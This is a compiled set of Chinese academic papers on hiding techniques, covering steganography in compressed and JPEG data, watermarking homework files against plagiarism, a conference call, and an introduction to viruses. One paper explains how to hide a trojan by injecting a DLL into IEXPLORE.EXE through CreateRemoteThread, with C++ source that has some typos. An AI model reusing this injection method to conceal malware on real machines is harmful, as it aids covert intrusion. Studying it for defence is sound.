隐藏技术论文8篇

绪论：在寻找写作灵感吗？爱发表网为您精选了8篇隐藏技术论文，愿这些内容能够启迪您的思维，激发您的创作热情，欢迎您的阅读与分享！

篇1

关键词：信息隐匿,压缩编码,数据变换,数据选择

1 引言

信息隐藏是一门新兴的信息安全技术。论文参考。涉及感知学，信息论,密码学等多个学科领域，涵盖信号处理，扩频通信等多专业技术。 近年来得到了迅猛发展。现阶段人们一般选择图像、文本、音频和视频等数字媒体作为载体。另外, 还出现了基于TCP/IP 的信息隐藏技术和基于信道编码的信息隐藏技术。本文研究的基于压缩编码的信息隐藏技术是信息隐藏技术的新领域, 它以多媒体系统中的压缩数据作为嵌入载体,数据解压后不影响原始数据数据的结构和统计特性, 具有较强的鲁棒性和不可检测性。

2 压缩编码信息隐藏的原理

压缩编码是一种提高数据传输有效性的技术，它是通过对数据施加某种操作或变换使之长度变短或者容量变小的同时, 还必须保证原始数据能够从压缩产生的压缩码中得以精确的还原。从信息论的角度来看，压缩就是去掉信息中的冗余，即保留不确定的信息，去掉确定的信息(可推知的)，也就是用一种更接近信息本质的描述来代替原有冗余的描述。这个本质的东西就是信息量(即不确定因素)。信息隐匿和数据压缩在本质上是相互联系的：对于数据压缩来讲，一块数据中隐匿了和数据本身无关的地的其它数据，那这块隐藏了信息的数据是有一定冗余的，由冗余的数据可以进一步被压缩，进一步压缩的就有可能去掉隐匿的数据；对于信息隐匿来说，一块已被压缩过的数据冗余量已经很小了，由于隐匿是嵌入的数据和原始数据毫无关系，在这块数据中进一步隐匿数据，势必造成原始掩护数据的有效数据的减少，相当于队已经压缩的数据进行进一步压缩。只要保证在接收端解压中可以恢复原始数据的差错率，就可以在压缩编码后进行信息隐匿，不会引起截获者怀疑码字载体中含有秘密信息。

3 压缩编码信息隐匿模型实现方案

基于信息隐匿和数据压缩的关系，提出结构如下的数据压缩思想的通用隐匿模型。模型主要由三个部分组成：图像压缩、信息加密和信息隐匿。图像压缩部分的量化器输出至信息隐匿部分，然后从信息隐匿部分得到隐藏有其他信息的量化数据，并送到熵编码器，其他内容和标准压缩过程一致。信息加密部分为传统的加密方案，其主要目的是增加秘密信息的安全性，使得系统隐匿的信息部分即使被检测出来，也不会泄露其内容。论文参考。

信息隐匿部分是模拟最核心的内容，这部分主要有三个部分组成：数据变换，数据选择和嵌入过程。数据变化的主要目的是改变加密后的信息统计特性，使得这些数据嵌入掩护图像量化后的数据之中，不改变或很少改变掩护图像的数据统计特性，从而使信息隐匿后的抗检测性大大增强。数据选择是从掩护图像量化后的数据中选择合适的比特位，用它来隐藏已加密的信息。合理的数据选择算法应该兼顾信息隐匿的容量，信息隐匿的抗检测性与鲁棒性。嵌入过程式将加密后的信息和选择出来的数据进行某种运算（通称为替换或异或）,用运算结果替换选择出来的数据，并将此数据连同未选择出来的量化数据一并交给图像压缩部分的熵编码进行编码。

图1 基于数据压缩思想的通用信息隐匿模型

通用模型的秘密信息提取过程基本上是隐匿的逆过程，其流程图如下

图2通用信息隐匿模型的信息提取过程

压缩后的数据首先经过熵解码器解码，然后进行数据分离，将未嵌入的数据部分送入正常的图像解码流程（反量化，反映射变换），而将嵌入数据的部分进行数据提取，如果此过程的算法不是盲的（即需要原始掩护图像），则需要分离出来的数据和原始掩护图像经映射变化，量化后的数据进行运算，将结果进行数据恢复、解密、最后得到嵌入的原始秘密信息。

4 隐匿模型的两种关键技术

在这种通用的信息隐匿模型中，数据变换和数据选择是关键技术

数据变换的主要目的是改变加密后的信息统计特性，增强系统信息隐匿的抗检测性能。改变数据的统计特性的常用方法是进行线性滤波，从本质上来讲，线性滤波和线性变换是一致的，从频域上来看，滤波就是对信号频谱的不同部分进行不同的缩放。在技术上常就是这样一个过程：DFT→相乘→IDFT，将这一过程合并为一体时，就成为一个单纯的线性变换。在复数域中进行整数的可逆处理时，数据量就会增加一倍，为此可以经DFT换成DCT，这样这一处理过程就成为一实数域的线性变换问题。

下面介绍整型变换算法的基本过程。

（1）对于给定的线性变换A，如是常见的线性变换，则进行（2），否则对其进行改造，使det| A ‘ |=1。

（2）将A ‘ 分解为3类基本矩阵（置换矩阵，元素的绝对值均不小于1的对角阵，单位三角矩阵）。

（3）对于每一基本矩阵，构造其整型变换，获得整数输出。

（4）对于每一步都应有相应的逆变换，所以整个变换的逆变换可以相应的获得。

（5）对于多维可分离的线性变换，正变换可以逐维的计算；为了保证逆变换对于多维数据的完全重建，应严格按照和正变换相反的次序进行逆变换。

实现数据变换时的另一个问题是数据的范围问题。在实际处理过程中，输入的数据都是有一定的范围的（比如原始图像数据通常用8位无符号数据表示），如果输出的数据不加以限制，则输出的数据的范围一般要增大，这样就必须用更多的数据表示处理结果。

数据选择过程是从掩护图像的量化数据中选择合适的比特位，用它来隐匿已加密的信息。最基本的做法是选择掩护数据中的不重要的部分，这样做得优点是对掩护图像的质量影响最小，使修改引起别人注意的可能性最小。但是在实际系统中，数据选择算法应该兼顾信息隐匿的容量，信息隐匿的抗检测性与鲁棒性等多个方面的性能，可以选择下面三种。

1.LSP（LeastSignificant Portion）最不重要部分

LSP技术和LSB（最不重要比特位）技术基本类似，区别在于LSB平等的对待掩护图像中的每一字节，不同的字节之间没有区别，在隐藏时都在数据的最低位取相等比特；而LSP针对变换量化后的数据而言，不同位置的重要程度不同，从中所取的最低有效比特数就不同，其中低频数据是取得少一些，而在高频数据中取得多一些。另外，不同位置的数据取值范围也不一样，最多的可取比特数也不一样。论文参考。

2.随机间隔法

随机间隔技术是以LSP为基础的一种方法，在数据选择时用一个掩密密钥k作随机数发生的种子，那么可以生成一个随机序列k 1 ，…，k l ，并且把它们一起按下列方式生成隐匿信息位置来对经LSP选择的数据进行进一步选择：j 1 =k 1

j i =k i +j i-1

从而可以伪随机决定两个嵌入位置的距离。这种方法由于隐匿的位置更少，所以更不容易被检测出来。

3.随机位置法

随机位置技术是另外一种伪随机的方法，它也以LSP技术为基础。和随机间隔法不同的是，它对不同的位置变换数据及量化数据的不同比特位赋予不同的选择概率p 1 ，…，p l ，在数据选择时也用一个伪装密钥k作为随机发送的种子，那么可以生成一个一个随机序列k 1 ，…，k l ，当k i ≥p i 时选择比特，否则不进行选择。在此方法中选择合适概率取值方案可以兼顾信息隐匿的容量、悬念吸引你的抗检测性与鲁棒性等多方面的性能，是一种更灵活的方法。当然可以将随机间隔法和随机位置发结合起来使用，那是一种更灵活、更复杂的方案。

5 实验结果

运用本文提出的通用模型，以lena(512像素×512像素)，作为掩护图像，在其中隐匿随机数据，映射变换采用8×8的DCT，经数据变换过程，结果如下图所示。图中从左到右，从上到下依次为：原始图像，未嵌入数据的JPEG图像，嵌入不等数据量的JPEG图像。随着嵌入数据量的增加，掩护图像的直观质量会下降，这种质量的下降类似于不同压缩比条件下JPEG图像质量的不同下降，从信息隐匿的角度来看，这种相似性是有利的。

图3 图用模型的数据隐匿效果

6 小结

研究了一种基于压缩编码的信息隐匿技术，介绍了信息隐匿通用模型的两种关键技术：数据变换和数据选择技术，通过实验得到嵌入量与图像质量的关系。随着通信技术的不断发展，信息安全将成为一门很重要的学科，对于通信信息隐匿还要寻找更先进，更合理的算法来达到通信的安全性能。

参考文献:

[1] KATZENBEISSERS, PETITCOLASFAP.信息隐藏技术—隐写术与数字水印[M].吴秋新,钮心忻,杨义先等译.北京:人民邮电出版社,2001.

[2] 汪小帆,戴跃伟. 信息隐藏技术方法与应用[M].北京:机械工业出版社,2001.

[3]柏森,胡中豫,吴乐华等.通信信息隐匿技术[M].北京:国防工业出版社,2005.

[4]王伟祥, 刘玉君.基于信道编码的信息隐藏技术研究.[J] 电视技术.2003(3).

篇2

关键词：电子作业；抄袭检查；文档指纹；信息隐藏

中图分类号：TP311 文献标识码：A 文章编号：1009-3044(2012)36-8679-02

随着计算机应用的普及，高校正在逐步实现作业的电子化和网络化。这种作业形式的改革有效减少了教育资源的浪费，减轻了教师的工作任务，提高了学生获得作业批阅结果的效率，教与学得到了互动。应该说作业的电子化是高校教学改革的一种必然趋势，但随之而来的是电子作业抄袭现象严重。学生抄袭作业时，少则部分复制他人文档，调整文档顺序，内容稍做修改;多则大部分甚至全盘拷贝他人文档。学生对于电子作业的抄袭轻松快捷又不易被识别，这就成为作业改革受到严重困扰的主要因素。

在电子作业的反抄袭检查工作上，教师的手工操作既耗时又费力，尤以高校学生人数众多，涉及的教师面而变得局限性很大。那么，建立一种快速、准确、高校的电子作业反抄袭检查模型若能够有效遏制了学生间电子作业相互拷贝，具有十分现实的意义。目的在于能够极大地提高教学的质量和效率，并有力的促进高校的教育改革。在应用领域抄袭检测算法已成为当前研究的热点话题，尤其是在学术论文的剽窃比对上。而我们能够在平时的教学工作中有效地抵制电子作业的抄袭现象，既能真实反映教学效果又能提高学生自主学习的意识和能力。这不仅是对于教学工作的促进更是培养人教育人的有效途径。

1 抄袭检查技术

计算机技术的发展和网络普遍应用，在无意间方便了很多人进行文章抄袭。其实电子作业抄袭现象是国内外的大学广泛存在的现象，为了有力遏制学生的这种不诚信的行为,国外早在20世纪90年代就开始了相应研究。由于西方语系的特点英语是以空格作为单词间隔,因此英语的抄袭检查方法是通过比较关键词来判断相似性的，效率很高。而中文与外文间存在着巨大的差异性, 强调词法与句法,因此关键词比对较不适用于中文。

目前中文的抄袭检查方法主要有基于字符串的匹配、基于统计的中文分词、文档指纹、句子相似度等。

2 电子作业反抄袭检查的实现

该文主要采用两种方法以实现电子作业的反抄袭检查：数字指纹技术和信息隐藏技术。首先吸取了文数字指纹技术的优势并对于指纹技术的算法（Hash函数）做出改进提出一种基于局部词频的指纹算法。其次很多高校特有应用的实验实习电子作业，此时内容都较为相似，所以该文又增加了基于信息隐藏技术的作业反抄袭检查方法，以对于这类电子作业进行有效的比对。

2.1基于局部词频的指纹技术

文档数字指纹技术是依据生成的待比较的文档指纹，通过在样本库中做对比进行抄袭检测。当相匹配指纹数目超过一定值时，可认定存在抄袭行为。为使其具有推广力，一般会引入松弛因子以提高检测的准确性。指纹生成算法是文档数字指纹技术的关键，一般利用 Hash 函数对文档中的特征标记进行计算，获得整数值。一般需要计算函数。

在高校的电子作业中很多都仅是对作业的句子的长度或词语的先后次序作了调整，内容的变化是较小的，用这种方法就会过度精确，用于检查电子作业效率很低。所以该文对这种算法做出一定改进，提出一种基于词频统计的指纹技术。局部词频统计技术借助于向量空间模型来实现。这种向量空间模型是由句子为单位构成的，并对句子进行关键词提取，并对关键词重新排序构建，根据编码与词频共同获取句子的指纹。依据句子的指纹获取文本相似度，具体的算法描述

2.2信息隐藏技术

在高校学生作业有一些是比较特殊的，例如在机房中完成的实验实习类报告，这类作业的特点是内容大致是相同的。可以在作业的源头采用一些基于信息隐藏的嵌入水印算法。在对作业进行片段拷贝时就在源头嵌入水印，能有效的防止拷贝抄袭的现象发生。这样即使电子作业的内容完全相同也能有效的检查到。不能轻易被破坏。这类作业防抄袭检查的水印嵌入既要求字符格式改变不易被擦觉也要兼顾有较大的信息嵌入量，不需太多的字符就能嵌入进机房的机器号及上机完成作业的时间。

由于人眼的视细胞对颜色敏感度的理论指出人眼对绿色最敏感，其次是红色，而对于蓝色是最不敏感的。而计算机的颜色设置理论是数字化的，所以可以对于RGB()的值中低位的值做秘密信息嵌入。可以对R值和G值改变都改变最低的1位bit，而对B值最低的2位bit。这样就对每个电子文档的字符嵌入了4位bit的信息隐藏，并把这4位二进制作为嵌入信息隐藏1Byte的高4位。同时也可以利用字符下划线的B值最低2位bit，G值的最低1位bit，和R值的最低1位bit来隐藏4位信息。这4位bit作为嵌入信息隐藏1Byte的低4位。

在实际操作中程序所嵌入的信息包括程序读取的机器号及上机时间与机房管理系统数据库配合能准确定位学生的学号、姓名、班级等。当学生完成自己的电子作业过程中点击保存、Word程序自动保存、关闭Word文档时都会触发这一嵌入秘密信息的相关程序的运行，可以在全文实现循环嵌入秘密信息的作用。该反抄袭程序是在打开作业文档时自动运行，能自主识别学生作业中具有抄袭嫌疑的片段，协助教师对学生的作业给出客观评价，有效的对这类作业的抄袭起到屏蔽的作用。

3 结束语

在以往的反抄袭检查中主要是通过文档间内容重叠程度或者相似程度来断定的，相关的检查技术也很多也较成熟。但往往面对的是海量数据或是长文档，并需要对文档字符做精确检查。而在教学过程中的电子作业无论在内容、篇幅和数量方面都有很大差别。

该文的创新点是结合了基于局部词频的指纹技术和嵌入水印的信息隐藏技术，提出了一处主要针对高校的作业特点的反抄袭检查的模型。较为全面的考虑到了这类作业不同于学术剽窃的相关问题，所建立的这种快速、准确、高效的电子作业反抄袭检查模型能够在一定程度上遏制学生间电子作业相互拷贝，具有十分现实的意义。

参考文献:

[1] 蒋波.一种基于三重DES和RSA的综合加密方案[J].微计算机信息,2007(18).

[2] 陈国良.并行算法实践[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷强奎,王秀坤,等. 基于局部词频指纹的论文抄袭检测算法[J].计算机工程,2011(6).

[4] 付兵.基于信息隐藏技术的电子作业防抄袭研究[J].微计算机信息,2009(18).

篇3

关键词:JPEG图像;隐写算法;信息隐藏;隐写分析

中图分类号:TN919.81文献标识码:A文章编号:1007-9599 (2010) 06-0000-01

Design&Implement of JPEG Image Steganography and Steganalysis Algorithm

Du Mingzhi

(Information Computer science Department,Fujian University of Technology,Fuzhou350108,China)

Abstract:At the base of introducing the status quo on the technology of information hidding and JPEG image steganography and steganalysis,This paper studied and implemented the F5 steganography algorithm of JPEG image.

Keywords:JPEGImage;Steganography algorithm;Information steganography;

Steganalysis

JPEG图像由于它的高压缩率和高表现性等优点,在Intrenet等环境中被广泛应用,因此,用JPEG图像为载体进行信息隐藏具有重要的应用价值。目前已经有多种实现JPEG图像隐写的技术,如Jsteg、F5、OutGuess等。然而这些方法往往会改变JPEG图像的分块特性及DCT系数直方图等统计特性,为攻击者提供线索。目前,根据公开发表的论文,JPEG图像隐写算法的安全性越来越高,隐写检测利用的理论和技术也越来越复杂,难度不断增加。

一、JPEG的研究模式

JPEG有几种模式,其中最常用的是基于DCT变换的顺序型模式,又称为基本系统,下面专门讨论这种模式。图像不以RGB坐标表示,而是使用的颜色是YUV格式,以一个亮度分量Y、两个色度分量U、V表示。因此,首先将RGB格式的图像转化为YUV格式(或叫做YIQ,YcrCb格式)。我们都知道,原始的彩色图像,一般由红、绿、蓝三种基色的图像组成。然而人的视觉系统对彩度的感觉和亮度的敏感性是不同的,在这里,首先介绍一下YUV格式。在JPEG发展过程中,实际使用的是YcrCb坐标系统,其中Y不变,Cr=(V/1.6)+0.5,Cb=(U/2)+0.5,通过这种压缩变换和0点转移,色度的值就总在1和0之间变化,乘于255就刚好能用一字节(8比特)表示。

二、算法的设计与实现

BMP是英文Bitmap(位图)的简写,它是Windows操作系统中的标准图像文件格式,能够被多种Windows应用程序所支持。这种格式使用很普遍,其结构简单,包含的图像信息较丰富,但由于未经过压缩,通常文件量较大。研究JPEG图像的压缩过程发现,在把BMP对象压缩位JPEG图像的中间过程中,可以通过改变量化后的DCT系数达到信息隐藏的目的。本文要介绍的方法也是通过少量改变量化后的DCT以达到隐写目的。本算法实现JPEG图像的信息隐藏,主要包括信息提取和信息嵌入两个模块。信息嵌入模块:使用隐写算法,把秘密信息隐藏在JPEG图像中。信息提取模块:根据提取算法,从带秘密信息的JPEG图像中提取秘密信息。

(一)混乱算法:如果把秘密信息顺次地嵌入到DCT序数上,那么秘密信息将会集中于图像的某一部分,从而导致图像质量不均衡。为了进一步提高隐写算法的性能,我们在隐写算法中加入了混乱算法,通过混乱算法,可以使嵌入的秘密信息均匀的分布到整幅图像中。

(二)矩阵编码:矩阵编码的目的是提高嵌入效率,使每个DCT系数的更改可以嵌入更多的秘密比特,即在2k-1个原始DCT系数中最多改变1比特达到嵌入k比特秘密信息的效果,有效减少JPEG图像DCT系数的改变量,从而提高隐写算法的安全性。

(三)嵌入算法:整合了混乱和矩阵编码技术的隐写嵌入算法如下:

1.对BMP图像进行色彩变换、离散余弦变换(DCT),量化DCT系数。

2.根据密钥产生随机序列,用于混乱嵌入,密钥做为随机因子。

3.根据随机序列嵌入秘密文件的信息DD秘密文件长度(用32位表示);

4.确定k,并计算n=2k-1。

5.实施矩阵编码嵌入。取出欲嵌入的k个秘密比特,n个非0的DCT系数,计算是否需要改动DCT系数,如果不需要改变则进行下一组嵌入,如果需要改动,则根据规则改变,然后进行下一组嵌入,直到嵌入完成。

6.对改变过的DCT做哈夫曼压缩,产生密写后的图像。

(四)提取算法:以下是带混乱和矩阵编码的隐写提取算法:

1.哈夫曼解码JPEG图像,得到所有的DCT系数。

2.根据密钥产生随机序列,用于混乱嵌入,密钥做为随机因子。

3.根据提取秘密文件信息头(32位),得到秘密文件的长度。

4.计算n和k。

5.实施矩阵解码,提取秘密信息。取n个非0的DCT系数,根据计算得到k个秘密比特,进入下一组提取,直到完成提取。

6.二进制输出秘密信息,得到秘密文件。

三.算法的优化设计

根据已发表的论文,简单的JPEG图像隐写效率大概是12%,即秘密信息能占到压缩完的JPEG图像大小的12%。算法同时也保持了图像直方图的一般特性,原始图像的DCT系数直方图特性依然得到保持。但F5算法因为没有使用值为0的DCT系数,而嵌入的时候又会有新的值为0的DCT系数产生,所以虽然保持了直方图特性,但压缩后的JPEG图像值为0的系数会比原始图像突出。接下来的算法的优化设计将会提出一种新方法解决这个问题。

采用F5算法隐写,DCT系数的绝对值被减1处理,所以隐写后的直方图就会和原始图像有差别,直方图将会从两端向中间收缩。根据柯克霍夫(Kerckhoffs)原则,隐写算法并不是通过算法的保密来到达隐写的安全的,而是通过密钥来体现的。这要求隐写图像不能明显改动原始图像的特性,当然,只是理想的状态,没有隐写算法能够达到这个安全级别,为了提高JPEG图像隐写的安全性,使算法不改变原始图像的直方图特性,我介绍一种改进的方法,并给出相应的数学证明。改进算法遵循的原则:

(一)由于视觉上对低频分量比较敏感,因此直流系数不用于负载秘密信息。

(二)JPEG图像中,大部分DCT系数都是0,如果在这些系数上隐写会减少0的数量,引起分析者怀疑,所以也不在值为0的DCT系数上负载秘密信息。

(三)用正奇数和负偶数表示秘密比特1,负奇数和正偶数表示秘密比特0,当欲嵌入的比特与DCT系数代表的信息不相同时,改变DCT系数的值。

(四)算法根据Hi提供的统计信息按概率随机改变DCT系数的值(绝对值增1或减1),例外情况是当DCT值为1时,要修改到-1或+2,当DCT系数值为-1时,要修改值为-2或+1。

参考文献:

[1]张华熊.信息隐藏――数字水印技术研究:[博士学位论文].浙江:浙江大学,2003

篇4

ICICS 2013将为国内外信息安全学者与专家齐聚一堂，提供探讨国际信息安全前沿技术的难得机会。作为国际公认的第一流国际会议，ICICS 2013将进一步促进国内外的学术交流，促进我国信息安全学科的发展。本次学术会议将由中国科学院软件研究所、北京大学软件与微电子学院和中国科学院信息工程研究所信息安全国家重点实验室主办，并得到国家自然基金委员会的大力支持。

会议论文集均由德国Springer出版社作为LNCS系列出版。ICICS2013欢迎来自全世界所有未发表过和未投递过的原始论文，内容包括访问控制、计算机病毒与蠕虫对抗、认证与授权、应用密码学、生物安全、数据与系统安全、数据库安全、分布式系统安全、电子商务安全、欺骗控制、网格安全、信息隐藏与水印、知识版权保护、入侵检测、密钥管理与密钥恢复、基于语言的安全性、操作系统安全、网络安全、风险评估与安全认证、云安全、无线安全、安全模型、安全协议、可信计算、可信赖计算、智能电话安全、计算机取证等，但又不局限于此内容。

作者提交的论文，必须是未经发表或未并行地提交给其他学术会议或学报的原始论文。所有提交的论文都必须是匿名的，没有作者名字、单位名称、致谢或其他明显透露身份的内容。论文必须用英文，并以 PDF 或 PS 格式以电子方式提交。排版的字体大小为11pt，并且论文不能超过12页（A4纸）。所有提交的论文必须在无附录的情形下是可理解的，因为不要求程序委员阅读论文的附录。如果提交的论文未遵守上述投稿须知，论文作者将自己承担论文未通过形式审查而拒绝接受论文的风险。审稿将由3位程序委员匿名评审，评审结果为：以论文形式接受；以短文形式接受；拒绝接受。

ICICS2013会议论文集可在会议其间获取。凡接受论文的作者中，至少有1位必须参加会议，并在会议上报告论文成果。

投稿截止时间：2013年6月5日 通知接受时间：2013年7月24日 发表稿提交截止时间：2013年8月14日

会议主席：林东岱 中国科学院信息工程研究所 研究员

程序委员会主席：卿斯汉 中国科学院软件研究所、北京大学软件与微电子学院 教授

Jianying ZHOU博士 Institute for Infocomm Research，新加坡

程序委员会：由国际和国内知名学者组成（参看网站 http：//icsd.i2r.a-star.edu.sg/icics2013/）

篇5

摘要进程的隐藏一直是木马程序设计者不断探求的重要技术，本文采用远程线程技术，通过动态链接库方法，较好地解决了这一问题，通过远程线程将木马作为线程隐藏在其他进程中，从而达到隐藏的目的。

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序，由于木马程序是运行在远程主机上，所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法，并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WindowsNT/2000中却完全不同，无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能躲过WindowsNT/2000的任务管理器，WindowsNT/2000的任务管理器均能轻松显示出木马进程，难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了？我们知道，在WINDOWS系统下，可执行文件主要是Exe和Com文件，这两种文件在运行时都有一个共同点，会生成一个独立的进程，寻找特定进程是我们发现木马的方法之一，随着入侵检测软件的不断发展，关联进程和SOCKET已经成为流行的技术，假设一个木马在运行时被检测软件同时查出端口和进程，我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的，要想做到木马的进程隐藏，有两个办法，第一是让系统管理员看不见你的进程；第二是不使用进程。本文以第二种方法为例加以讨论，其基本原理是将自已的木马以线程方式嫁接于远程进程之中，远程进程则是合法的用户程序，这样用户管理者看到的只是合法进程，而无法发现木马线程的存在，从而达到隐藏的目的。

2实现方法

为了弄清实现方法，我们必须首先了解Windows系统的另一种"可执行文件"----DLL，DLL是DynamicLinkLibrary（动态链接库）的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL，假设我们编写了一个木马DLL，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现木马DLL，如果那个进程是可信进程，（例如浏览器程序IEXPLORE.EXE，没人会怀疑它是木马吧？）那么我们编写的DLL作为那个进程的一部分，也将成为被信赖的一员，也就达到了隐藏的目的。

运行DLL方法有多种，但其中最隐蔽的方法是采用动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如：窗口Hook、挂接API、远程线程等，这里介绍一下远程线程技术，它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道，在进程中，可以通过CreateThread函数创建线程，被创建的新线程与主线程（就是进程启动时被同时自动建立的那个线程）共享地址空间以及其他的资源。但是很少有人知道，通过CreateRemoteThread也同样可以在另一个进程内创建新线程，被创建的远程线程同样可以共享远程进程（是远程进程）的地址空间，所以，实际上，我们通过一个远程线程，进入了远程进程的内存地址空间，也就拥有了那个远程进程相当的权限。

3实施步骤

1）用Process32Next（）函数找到宿主进程,获取宿主进程ID,并用

OpenProcess（）函数打开宿主进程。

2）用VirtualAllocEx（）函数分配远程进程地址空间中的

内存。

3）用WriteProcessMemory（）函数将待隐藏的DLL的路径名。

4）拷贝到步骤二已经分配的内存中。

5）用GetProcAddress（）函数获取LoadlibraryA（）函数的实地址（在kernel32.dll中）。

6）用CreateRemoteThread（）函数在远程进程中创建一个线程。

7）它调用正确的LoadlibraryA（）函数。

8）为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码：

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程，以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此，远程嵌入顺利完成，为了试验我们的hide.dll是不是已经正常地在远程线程运行，我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试：

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208），该测试DLL弹出了1208字样的确认框，同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成，未作改动，故略之。

5结束语

进程隐藏技术和方法有很多，而且这一技术发展也相当快，本文仅从一个侧面加以讨论，希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识，同时也为我们防范他人利用进程隐藏手段非法入侵提供参考，本文抛砖引玉，不当之处诚恳批评指正。

参考文献

篇6

0引言

计算机网络是信息社会的基础，已经进入了社会的各个角落，经济、文化、军事和社会生活越来越多的依赖计算机网络。然而，计算机在给人们带来巨大便利的同时，也带来了不可忽视的问题，计算机病毒给网络系统的安全运行带来了极大的挑战。2003年1月25日，突如其来的“蠕虫王”病毒，在互联网世界制造了类似于“9.11”的恐怖袭击事件，很多国家的互联网也受到了严重影响。同样，前两年李俊制作的“熊猫烧香”病毒再次为计算机网络安全敲起了警钟。据美国计算机权威组织报告，全球已发现的计算机病毒总和超过6万多种，而且每天还有100多种以上的新病毒问世，同时计算机病毒在2000年造成的全球经济损失高达1.6万亿美元。因此，研究计算机病毒与防治就显得极具紧迫，意义重大。

1计算机病毒的含义

关于计算机病毒的定义，目前国内外有各种各样的定义，但在《中华人民共和国计算机系统安全保护条例》中对病毒是这样定义的：“编制或在计算机程序中插入的破坏计算机功能或者数据，影响计算机使用，并且能够自我复制的一组计算本论文由整理提供机指令或者程序代码”。因此，像炸弹、蠕虫、熊猫烧香等均可称为计算机病毒。

2计算机病毒的特征

计算机病毒是一段特殊的程序。除了与其他程序一样，可以存储和运行外，计算机病毒还有感染性、潜伏性、可触发性、破坏性衍生性等特征。下面简单就计算机病毒的特性加以介绍：

